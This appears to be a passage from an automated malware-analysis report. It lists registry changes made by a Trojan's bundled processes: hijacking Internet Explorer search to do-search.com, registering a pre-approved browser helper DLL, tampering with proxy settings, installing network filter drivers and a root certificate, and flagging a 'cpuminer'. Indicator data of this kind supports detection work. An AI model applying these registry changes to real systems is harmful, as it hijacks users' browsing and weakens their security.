[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process powershell.exe:3772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"
The process powershell.exe:3656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"
The process powershell.exe:3376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "8A 92 33 64 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll,"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process XTab_Setup2253.exe:1748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\HELPDIR]
"(Default)" = "%Program Files% (x86)\XTab"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}" = "1"
[HKLM\SOFTWARE\Wow6432Node\supTab]
"ptid" = "pcm"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02"
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4B 00 00 00 09 00 00 00 00 00 00 00"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0]
"(Default)" = "SupTabLib"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURL" = "http://www.bing.com/favicon.ico"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\0\win32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
"(Default)" = "IETabPage Class"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\PreApproved]
"{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}" = ""
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\Version]
"(Default)" = "1.0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
"DisplayName" = "Bing"
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconURL" = "http://www.google.com/favicon.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}"
[HKLM\SOFTWARE\Wow6432Node\SupDp]
"dir" = "%Program Files% (x86)\XTab"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconURL" = "http://do-search.com//favicon.ico"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"TopResultURL" = "http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"TopResultURL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY]
"CheckedValue" = "PMIL"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"DisplayName" = "Google"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"DisplayName" = "e"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY]
"DefaultValue" = "PMIL"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{E733165D-CBCF-4FDA-883E-ADEF965B476C}.ico"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "1D EF BE 63 9A 83 D0 01"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 46 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process amisid.exe:3516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\InternetTurbo]
"UID" = "915A4028688142931B5DDA64A4540CAD"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"QuietUninstallString" = "%Program Files% (x86)\GOSafer\uninst.exe"
"Comments" = "Your custom offers and deals!(xBLWr3p4Aq2S5TKPAPwXoUXvWB)"
[HKLM\SOFTWARE\GOSafer]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"DisplayVersion" = "1.0"
"Publisher" = "GO SAFER LLC"
"UninstallString" = "%Program Files% (x86)\GOSafer\uninst.exe"
"DisplayName" = "GOSafer"
The process nfregdrv.exe:3076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0B 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
The process nfregdrv.exe:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0A 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
The process CashReminder.exe:1108 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\System\CurrentControlSet\Services\crfilterdrv]
"Tag" = "15"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0E 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\CashReminder]
"instid" = "Oe7hZG4iL2THGzzgTyPL5m0uORXCQUea"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in the system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\CashReminder]
"Version" = "1.0.0"
"affid" = ""
[HKLM\System\CurrentControlSet\Services\CashReminder]
"Description" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices!"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayName" = "CashReminder"
"Publisher" = "Related Deals LLC"
"UninstallString" = "%Program Files% (x86)\CashReminder\uninstall.exe /S"
"Comments" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices! (Build: EZbBN9f90YpDduoIMPstB7W)"
[HKLM\SOFTWARE\Wow6432Node\CashReminder]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayVersion" = "1.0.0"
"QuietUninstallString" = "%Program Files% (x86)\CashReminder\uninstall.exe /S"
The process ActSys.exe:3756 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "22 FE 3B 6A 9A 83 D0 01"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\System\CurrentControlSet\Services\asfilterdrv]
"Tag" = "19"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\527254500A2C2998BD4D09D9989A7F3E76405E07]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 52 72 54 50"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "12 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionTime" = "BE 7F E7 6B 9A 83 D0 01"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\ActSys]
"instid" = "RB2FatLSVuE3rC0Sz2xcEzbzGA6K2yY0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"527254500A2C2998BD4D09D9989A7F3E76405E07"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
